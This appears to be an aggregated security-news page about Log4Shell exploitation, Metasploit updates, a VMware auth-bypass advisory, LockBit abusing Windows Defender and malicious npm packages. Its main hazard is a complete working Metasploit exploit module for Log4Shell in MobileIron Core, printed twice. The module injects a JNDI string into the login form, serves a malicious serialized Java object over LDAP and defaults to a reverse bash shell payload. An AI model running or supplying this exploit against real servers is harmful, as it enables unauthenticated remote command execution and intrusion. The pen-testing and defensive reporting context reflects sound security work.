Iranian Hackers Exploiting Unpatched Log4j 2 Bugs to Target Israeli Organizations

 

Description

Iranian state-sponsored actors are leaving no stone unturned to exploit unpatched systems running Log4j to target Israeli entities, indicating the vulnerability’s long tail for remediation.

Microsoft attributed the latest set of activities to the umbrella threat group tracked as MuddyWater (aka Cobalt Ulster, Mercury, Seedworm, or Static Kitten), which is linked to the Iranian intelligence apparatus, the Ministry of Intelligence and Security (MOIS).

The attacks are notable for using SysAid Server instances unsecured against the Log4Shell flaw as a vector for initial access, marking a departure from the actors’ pattern of leveraging VMware applications for breaching target environments.

“After gaining access, Mercury establishes persistence, dumps credentials, and moves laterally within the targeted organization using both custom and well-known hacking tools, as well as built-in operating system tools for its hands-on-keyboard attack,” Microsoft said.

The tech giant’s threat intelligence team said it observed the attacks between July 23 and 25, 2022.

A successful compromise is said to have been followed by the deployment of web shells to execute commands that permit the actor to conduct reconnaissance, establish persistence, steal credentials, and facilitate lateral movement.

Also employed for command-and-control (C2) communication during intrusions is a remote monitoring and management software called eHorus and Ligolo, a reverse-tunneling tool of choice for the adversary.

The findings come as the U.S. Department of Homeland Security’s Cyber Safety Review Board (CSRB) deemed the critical vulnerability in the open-source Java-based logging framework an endemic weakness that will continue to plague organizations for years to come as exploitation evolves.

Log4j’s wide usage across many suppliers’ software and services means sophisticated adversaries like nation-state actors and commodity operators alike have opportunistically taken advantage of the vulnerability to mount a smorgasbord of attacks.

The Log4Shell attacks also follow a recent report from Mandiant that detailed an espionage campaign aimed at Israeli shipping, government, energy, and healthcare organizations by a likely Iranian hacking group dubbed UNC3890.

Read More

Pushing Open-Source Security Forward: Insights From Black Hat 2022

 

Description

Open-source security has been a hot topic in recent years, and it’s proven to be something of a double-edged sword. On the one hand, there’s an understanding of the potential that open-source tools hold for democratizing security, making industry best practices accessible to more organizations and helping keep everyone’s data better protected from attackers. On the other hand, open-source codebases have been the subject of some of the most serious and high-impact vulnerabilities we’ve seen over the past 12 months, namely Log4Shell and Spring4Shell.

While the feeling around open-source understandably wavers between excitement and trepidation, one thing is for sure: Open-source frameworks are here to stay, and it’s up to us to ensure they deliver on their potential and at the same time remain secure.

The future of open-source was common theme at Black Hat 2022, and two members of the Rapid7 research team — Lead Security Research Spencer McIntyre and Principal Security Researcher Curt Barnard — shined a light on the work they’ve been doing to improve and innovate with open-source tools. Here’s a look at their presentations from Black Hat, and how their efforts are helping push open-source security forward.

A more powerful Metasploit

Spencer, whose work focuses primarily on Rapid7’s widely used attacker emulation and penetration testing tool Metasploit, shared the latest and greatest improvements he and the broader team have made to the open-source framework in the past year. The upgrades they’ve made reflect a reality that security pros across the globe are feeling everyday: The perimeter is disappearing.

In a threat environment shaped by ransomware, supply chain attacks, and widespread vulnerabilities like Log4Shell, bad actors are increasingly stringing together complex attack workflows leveraging multiple vulnerabilities. These techniques allow adversaries to go from outside to within an organization’s network more quickly and easily than ever before.

The updates Spencer and team have made to Metasploit are intended to help security teams keep up with this shift, with more modern, streamlined workflows for testing the most common attack vectors. These recent improvements to Metasploit include:

****Credential capturing:**** Credential capture is a key component of the attacker emulation toolkit, but previously, the process for this in Metasploit involved spinning up 13 different modules and managing and specifying configurations for each. Now, Metasploit offers a credential capture plugin that lets you configure all options from a single start/stop command, eliminating redundant work.

****User interface (UI) optimization:****URLs are commonly used to identify endpoints — particularly web applications — during attacker emulation. Until now, Metasploit required users to manually specify quite a few components when using URLs. The latest update to the Metasploit UI understands a URL’s format, so users can copy and paste them from anywhere, even right from their browser.

****Payloadless session capabilities:****When emulating attacks, exploits typically generate Meterpreter payloads, making them easy to spot for many antivirus and EDR solutions — and reducing their effectiveness for security testing. Metasploit now lets you run post-exploitation actions and operations without needing a payload. You can tunnel modules through SSH sessions or create a WinRM session for any Metasploit module compatible with the shell session type, removing the need for a payload like reverse shell or Meterpreter.

****SMB server support:**** Metasploit Version 6 included SMB 3 server support, but only for client modules, which was limiting for users who were working with modern Windows targets that had disabled SMB 3 client support. Now, SMB 3 is available in all SMB server modules, so you can target modern Windows environments and have them fetch (often payload) files from Metasploit. This means you don’t need to install and configure an external service to test for certain types of vulnerabilities, including PrintNightmare.

Defaultinator: Find default credentials faster

Metasploit is at the heart of Rapid7’s commitment to open-source security, but we’re not stopping there. In addition to continually improving Metasploit, our research team works on new open-source projects that help make security more accessible for all. The latest of those is Defaultinator, a new tool that Curt Barnard announced the release of in his Black Hat Arsenal talk this year. (Curt also joined our podcast, Security Nation, to preview the announcement — check out that episode if you haven’t yet!)

Defaultinator is an open-source tool for looking up default usernames and passwords, providing an easy-to-search data repository in which security pros can query these commonly used credentials to find and eliminate them from their environment. This capability is becoming increasingly important for security teams, for a few key reasons:

• Some commonly used pieces of hardware in IT environments come with default credentials that could give attackers an easily exploitable method of network access. Curt gave the example of the Raspberry Pi microcontroller board, which always comes with the username “pi” and password “raspberry” for initial login — a security flaw that resulted in a 10 CVSS vulnerability published in 2021.
• Meanwhile, IoT devices have been proliferating, and many of these manufacturers don’t have security best practices at the front of their mind. That means hardcoded default credentials for first-time logins are common in this type of tool.
• Many software engineers (Curt included) spend a lot of time in Stack Overflow, and many of the code snippets found there contain example usernames and passwords. If you aren’t careful when copying and pasting, default credentials could make their way into your production environment.

With a whopping 54 CVEs for hardcoded usernames and passwords released just in 2022 so far (by Curt’s count), security pros are in need of a fast, accurate way to audit for default credentials. But until now, the tools for these kinds of audits just haven’t been out there, let alone widely available.

That’s why it was so important to make Defaultinator, the first tool of its kind for querying default usernames and passwords, an open-source solution — to ensure broad accessibility and help as many defenders as possible. Defaultinator offers an API search-based utility or a web-based user interface if you prefer not to interact with the API. It runs in Docker, and the quickstart repository on Github takes just four lines of code to get up and running.

Read More

MobileIron Log4Shell Remote Command Execution Exploit

 

Description

MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the tomcat user. This Metasploit module will start an LDAP server that the target will need to connect to.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Log4Shell
  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(_info = {})
    super(
      'Name' => 'MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)',
      'Description' => %q{
        MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server
        will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS
        command execution in the context of the tomcat user.

        This module will start an LDAP server that the target will need to connect to.
      },
      'Author' => [
        'Spencer McIntyre', # JNDI/LDAP lib stuff
        'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff
        'rwincey', # discovered log4shell vector in MobileIron
        'jbaines-r7' # wrote this module
      ],
      'References' => [
        [ 'CVE', '2021-44228' ],
        [ 'URL', 'https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis'],
        [ 'URL', 'https://forums.ivanti.com/s/article/Security-Bulletin-CVE-2021-44228-Remote-code-injection-in-Log4j?language=en_US' ],
        [ 'URL', 'https://www.mandiant.com/resources/mobileiron-log4shell-exploitation' ]
      ],
      'DisclosureDate' => '2021-12-12',
      'License' => MSF_LICENSE,
      'DefaultOptions' => {
        'RPORT' => 443,
        'SSL' => true,
        'SRVPORT' => 389,
        'WfsDelay' => 30
      },
      'Targets' => [
        [
          'Linux', {
            'Platform' => 'unix',
            'Arch' => [ARCH_CMD],
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/unix/reverse_bash'
            }
          },
        ]
      ],
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS],
        'AKA' => ['Log4Shell', 'LogJam'],
        'Reliability' => [REPEATABLE_SESSION],
        'RelatedModules' => [
          'auxiliary/scanner/http/log4shell_scanner',
          'exploit/multi/http/log4shell_header_injection'
        ]
      }
    )
    register_options([
      OptString.new('TARGETURI', [ true, 'Base path', '/'])
    ])
  end

  def wait_until(&block)
    datastore['WfsDelay'].times do
      break if block.call

      sleep(1)
    end
  end

  def check
    validate_configuration!

    vprint_status('Attempting to trigger the jndi callback...')

    start_service
    res = trigger
    return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?

    wait_until { @search_received }
    @search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')
  ensure
    cleanup_service
  end

  def build_ldap_search_response_payload
    return [] if @search_received

    @search_received = true

    return [] unless @exploiting

    print_good('Delivering the serialized Java object to execute the payload...')
    build_ldap_search_response_payload_inline('CommonsBeanutils1')
  end

  def trigger
    @search_received = false

    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri, 'mifs', 'j_spring_security_check'),
      'headers' => {
        'Referer' => "https://#{rhost}#{normalize_uri(target_uri, 'mifs', 'user', 'login.jsp')}"
      },
      'encode' => false,
      'vars_post' => {
        'j_username' => log4j_jndi_string,
        'j_password' => Rex::Text.rand_text_alphanumeric(8),
        'logincontext' => 'employee'
      }
    )
  end

  def exploit
    validate_configuration!
    @exploiting = true
    start_service
    res = trigger
    fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?
    fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') unless res.code == 302

    wait_until { @search_received && (!handler_enabled? || session_created?) }
    handler
  end
end

Read More

VMWare Urges Users to Patch Critical Authentication Bypass Bug

 

Description

VMware and experts alike are urging users to patch multiple products affected by a critical authentication bypass vulnerability that can allow an attacker to gain administrative access to a system as well as exploit other flaws.

The bug—tracked as CVE-2022-31656—earned a rating of 9.8 on the CVSS and is one of a number of fixes the company made in various products in an update released on Tuesday for flaws that could easily become an exploit chain, researchers said.

CVE-2022-31656 also certainly the most dangerous of these vulnerabilities, and likely will become more so as the researcher who discovered it–Petrus Viet of VNG Security–has promised in a tweet that a proof-of-concept exploit for the bug is “soon to follow,” experts said.

This adds urgency to the need for organizations affected by the flaw to patch now, researchers said.

“Given the prevalence of attacks targeting VMware vulnerabilities and a forthcoming proof-of-concept, organizations need to make patching CVE-2022-31656 a priority,” Claire Tills, senior research engineer with Tenable’s Security Response Team, said in an email to Threatpost. “As an authentication bypass, exploitation of this flaw opens up the possibility that attackers could create very troubling exploit chains.”

Potential for Attack Chain

Specifically, CVE-2022-31656 is an authentication bypass vulnerability affecting VMware Workspace ONE Access, Identity Manager and vRealize Automation.

The bug affects local domain users and requires that a remote attacker must have network access to a vulnerable user interface, according to a blog post by Tills published Tuesday. Once an attacker achieves this, he or she can use the flaw to bypass authentication and gain administrative access, she said.

Moreover, the vulnerability is the gateway to exploiting other remote code execution (RCE) flaws addressed by VMWare’s release this week—CVE-2022-31658 and CVE-2022-31659—to form an attack chain, Tills observed.

CVE-2022-31658 is a JDBC injection RCE vulnerability that affect VMware Workspace ONE Access, Identity Manager and vRealize Automation that’s earned an “important” score on the CVSS—8.0. The flaw allows a malicious actor with administrator and network access to trigger RCE.

CVE-2022-31659 is an SQL injection RCE vulnerability that affects VMware Workspace ONE Access and Identity Manager and also earned a rating of 8.0 with a similar attack vector to CVE-2022-31658. Viet is credited with discovering both of these flaws.

The other six bugs patched in the update include another RCE bug (CVE-2022-31665) rated as important; two privilege escalation vulnerabilities (CVE-2022-31660 and CVE-2022-31661) rated as important; a local privilege escalation vulnerability (CVE-2022-31664) rated as important; a URL Injection Vulnerability (CVE-2022-31657) rated as moderate; and a path traversal vulnerability (CVE-2022-31662) rated as moderate.

Patch Early, Patch Everything

VMware is no stranger to having to rush out patches for critical bugs found in its products, and has suffered its share of security woes due to the ubiquity of its platform across enterprise networks.

In late June, for example, federal agencies warned of attackers pummeling VMware Horizon and Unified Access Gateway (UAG) servers to exploit the now-infamous Log4Shell RCE vulnerability, an easy-to-exploit flaw discovered in the Apache logging library Log4J late last year and continuously targeted on VMware and other platforms since then.

Indeed, sometimes even patching has still not been enough for VMware, with attackers targeting existing flaws after the company does its due diligence to release a fix.

This scenario occurred in December 2020, when the feds warned the adversaries were actively exploiting a weeks-old bug in Workspace One Access and Identity Manager products three days after the vendor patched the vulnerability.

Though all signs point to the urgency of patching the latest threat to VMware’s platform, it’s highly likely that even if the advice is heeded, the danger will persist for the foreseeable future, observed one security professional.

Though enterprises tend to initially move quickly to patch the most imminent threats to their network, they often miss other places attackers can exploit a flaw, observed Greg Fitzgerald, co-founder of Sevco Security, in an email to Threatpost. This is what leads to persistent and ongoing attacks, he said.

“The most significant risk for enterprises isn’t the speed at which they are applying critical patches; it comes from not applying the patches on every asset,” Fitzgerald said. “The simple fact is that most organizations fail to maintain an up-to-date and accurate IT asset inventory, and the most fastidious approach to patch management cannot ensure that all enterprise assets are accounted for.”

Read More

MobileIron Log4Shell Remote Command Execution

`##  

# This module requires Metasploit: https://metasploit.com/download  

# Current source: https://github.com/rapid7/metasploit-framework  

##  

class MetasploitModule < Msf::Exploit::Remote  

Rank = ExcellentRanking  

  

include Msf::Exploit::Remote::Log4Shell  

include Msf::Exploit::Remote::HttpClient  

prepend Msf::Exploit::Remote::AutoCheck  

  

def initialize(_info = {})  

super(  

'Name' => 'MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)',  

'Description' => %q{  

MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server  

will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS  

command execution in the context of the tomcat user.  

  

This module will start an LDAP server that the target will need to connect to.  

},  

'Author' => [  

'Spencer McIntyre', # JNDI/LDAP lib stuff  

'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff  

'rwincey', # discovered log4shell vector in MobileIron  

'jbaines-r7' # wrote this module  

],  

'References' => [  

[ 'CVE', '2021-44228' ],  

[ 'URL', 'https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis'],  

[ 'URL', 'https://forums.ivanti.com/s/article/Security-Bulletin-CVE-2021-44228-Remote-code-injection-in-Log4j?language=en_US' ],  

[ 'URL', 'https://www.mandiant.com/resources/mobileiron-log4shell-exploitation' ]  

],  

'DisclosureDate' => '2021-12-12',  

'License' => MSF_LICENSE,  

'DefaultOptions' => {  

'RPORT' => 443,  

'SSL' => true,  

'SRVPORT' => 389,  

'WfsDelay' => 30  

},  

'Targets' => [  

[  

'Linux', {  

'Platform' => 'unix',  

'Arch' => [ARCH_CMD],  

'DefaultOptions' => {  

'PAYLOAD' => 'cmd/unix/reverse_bash'  

}  

},  

]  

],  

'Notes' => {  

'Stability' => [CRASH_SAFE],  

'SideEffects' => [IOC_IN_LOGS],  

'AKA' => ['Log4Shell', 'LogJam'],  

'Reliability' => [REPEATABLE_SESSION],  

'RelatedModules' => [  

'auxiliary/scanner/http/log4shell_scanner',  

'exploit/multi/http/log4shell_header_injection'  

]  

}  

)  

register_options([  

OptString.new('TARGETURI', [ true, 'Base path', '/'])  

])  

end  

  

def wait_until(&block)  

datastore['WfsDelay'].times do  

break if block.call  

  

sleep(1)  

end  

end  

  

def check  

validate_configuration!  

  

vprint_status('Attempting to trigger the jndi callback...')  

  

start_service  

res = trigger  

return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?  

  

wait_until { @search_received }  

@search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')  

ensure  

cleanup_service  

end  

  

def build_ldap_search_response_payload  

return [] if @search_received  

  

@search_received = true  

  

return [] unless @exploiting  

  

print_good('Delivering the serialized Java object to execute the payload...')  

build_ldap_search_response_payload_inline('CommonsBeanutils1')  

end  

  

def trigger  

@search_received = false  

  

send_request_cgi(  

'method' => 'POST',  

'uri' => normalize_uri(target_uri, 'mifs', 'j_spring_security_check'),  

'headers' => {  

'Referer' => "https://#{rhost}#{normalize_uri(target_uri, 'mifs', 'user', 'login.jsp')}"  

},  

'encode' => false,  

'vars_post' => {  

'j_username' => log4j_jndi_string,  

'j_password' => Rex::Text.rand_text_alphanumeric(8),  

'logincontext' => 'employee'  

}  

)  

end  

  

def exploit  

validate_configuration!  

@exploiting = true  

start_service  

res = trigger  

fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?  

fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way') unless res.code == 302  

  

wait_until { @search_received && (!handler_enabled? || session_created?) }  

handler  

end  

end  

`

Read More

LockBit Ransomware Abuses Windows Defender to Deploy Cobalt Strike Payload

 

Description

A threat actor associated with the LockBit 3.0 ransomware-as-a-service (RaaS) operation has been observed abusing the Windows Defender command-line tool to decrypt and load Cobalt Strike payloads.

According to a report published by SentinelOne last week, the incident occurred after obtaining initial access via the Log4Shell vulnerability against an unpatched VMware Horizon Server.

“Once initial access had been achieved, the threat actors performed a series of enumeration commands and attempted to run multiple post-exploitation tools, including Meterpreter, PowerShell Empire, and a new way to side-load Cobalt Strike,” researchers Julio Dantas, James Haughom, and Julien Reisdorffer said.

LockBit 3.0 (aka LockBit Black), which comes with the tagline “Make Ransomware Great Again!,” is the next iteration of the prolific LockBit RaaS family that emerged in June 2022 to iron out critical weaknesses discovered in its predecessor.

It’s notable for instituting what’s the first-ever bug bounty for a RaaS program. Besides featuring a revamped leak site to name-and-shame non-compliant targets and publish extracted data, it also includes a new search tool to make it easier to find specific victim data.

The use of living-off-the-land (LotL) techniques by cyber intruders, wherein legitimate software and functions available in the system are used for post-exploitation, is not new and is usually seen as an attempt to evade detection by security software.

Earlier this April, a LockBit affiliate was found to have leveraged a VMware command-line utility called VMwareXferlogs.exe to drop Cobalt Strike. What’s different this time around is the use of MpCmdRun.exe to achieve the same goal.

MpCmdRun.exe is a command-line tool for carrying out various functions in Microsoft Defender Antivirus, including scanning for malicious software, collecting diagnostic data, and restoring the service to a previous version, among others.

In the incident analyzed by SentinelOne, the initial access was followed by downloading a Cobalt Strike payload from a remote server, which was subsequently decrypted and loaded using the Windows Defender utility.

“Tools that should receive careful scrutiny are any that either the organization or the organization’s security software have made exceptions for,” the researchers said.

“Products like VMware and Windows Defender have a high prevalence in the enterprise and a high utility to threat actors if they are allowed to operate outside of the installed security controls.”

The findings come as initial access brokers (IABs) are actively selling access to company networks, including managed service providers (MSPs), to fellow threat actors for profit, in turn offering a way to compromise downstream customers.

In May 2022, cybersecurity authorities from Australia, Canada, New Zealand, the U.K., and the U.S. warned of attacks weaponizing vulnerable managed service providers (MSPs) as an “initial access vector to multiple victim networks, with globally cascading effects.”

“MSPs remain an attractive supply chain target for attackers, particularly IABs,” Huntress researcher Harlan Carvey said, urging companies to secure their networks and implement multi-factor authentication (MFA).

Read More

Malicious Npm Packages Tapped Again to Target Discord Users

 

Description

Threat actors once again are using the node package manager (npm) repository to hide malware that can steal Discord tokens to monitor user sessions and steal data on the popular chat and collaboration platform, researchers have found.

A campaign discovered this week by Kaspersky researchers is hiding an open-source token logger alongside a novel JavaScript malware in npm packages. The campaign, dubbed LofyLife, is aimed at stealing Discord tokens as well as victims’ IP addresses from infected machines, they said in a blog post on Secure List published Thursday.

Researchers were monitoring open-source repositories on Tuesday when they noticed suspicious activity in the form of four packages containing “highly obfuscated malicious Python and JavaScript code” in the npm repository, they wrote in the post.

The Python code turned out to be a modified version of the open-source token logger Volt Stealer, while the novel JavaScript malware–dubbed “LofyStealer”–was created to infect Discord client files so threat actors can monitor the victim’s actions, researchers said.

“It detects when a user logs in, changes email or password, enables/disables multi-factor authentication (MFA) and adds new payment methods, including complete bank card details,” researchers Igor Kuznetsov and Leonid Bezvershenko wrote. “Collected information is also uploaded to the remote endpoint whose address is hard-coded.”

Npm As Supply-Chain Threat

The npm repository is an open-source home for JavaScript developers to share and reuse code blocks that then can be reused to build various web applications. The repository poses a significant supply-chain given that if it’s corrupted, the malicious code is then propagated in any app using it and thus can be used to attack those app’s myriad users.

Indeed, attacking open-source repositories can be an unusually stealthy way for threat actors to target scores of apps and users in one fell swoop. This was made abundantly clear with the now infamous Log4Shell debacle, when a zero-day flaw in the ubiquitous Java logging library Apache Log4j used by countless web apps threatened to break the internet.

“Many people assumed that software created by a vendor was entirely authored by that vendor, but in reality there could be hundreds of third-party libraries making up even the simplest software,” observed Tim Mackey, principal security strategist at the Synopsys Cybersecurity Research Center, in an email to Threatpost.

This broad attack surface has not gone unnoticed by threat actors, who increasingly are targeting open-source repositories to hide malware that can lurk unsuspected across multiple platforms.

“Any attack vector that can reach a significant number of targets, or a number of significant targets is of interest to threat actors,” Casey Bisson, head of product and developer enablement at code-security firm BluBracket, wrote in an email to Threatpost.

Discord in the Crosshairs

Npm has become an especially attractive target for threat actors as it not only has tens of millions of users, but packages hosted by the repository also have been downloaded billions of times, he said.

“It’s used both by experienced Node.js developers and those using it casually as part of other activities,” Bisson observed. “Npm modules are used both in Node.js production applications, and in developer tooling for applications that wouldn’t otherwise use Node. That ubiquitous use among developers makes it a big target.”

Indeed, LofyLife is not the first time threat actors have used npm to target Discord users. In December, researchers at JFrog identified a set of 17 malicious npm packages with varying payloads and tactics that targeted the virtual meeting platform, which is used by 350 million users and enables communication via voice calls, video calls, text messaging and files.

Prior to that in January 2021, other researchers discovered three malicious npm packages from the threat actors behind the CursedGrabber malware aimed at stealing Discord tokens and other data from users of the platform.

Kaspersky, among other security firms, is constantly monitoring updates to npm repositories to ensure that all new malicious packages are detected and removed, researchers said.

Read More